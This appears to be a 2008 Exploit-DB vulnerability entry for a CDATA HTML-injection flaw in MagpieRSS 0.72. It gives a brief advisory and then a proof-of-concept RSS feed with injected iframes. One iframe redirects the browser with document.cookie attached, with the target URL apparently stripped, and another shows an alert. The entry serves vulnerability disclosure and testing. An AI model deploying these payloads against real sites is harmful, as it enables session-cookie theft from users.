MagpieRSS 0.72 CDATA HTML Injection Vulnerability

EDB-ID: 32686 CVE: N/A OSVDB-ID: 52039
Verified: Author: system_meltdown Published: 2008-12-29
Download Exploit: Source Raw Download Vulnerable App: N/A

MagpieRSS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

MagpieRSS 0.72 is vulnerable; other versions may also be affected.

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="">

<title><![CDATA["><iframe src="javascript:window.location=&#039;;+document.cookie"></iframe><a lol="]]></title>
<description>XSS test</description>

<link><![CDATA[what teh hax?!]]></link>

"><iframe src="javascript:alert(/xss/)"></iframe>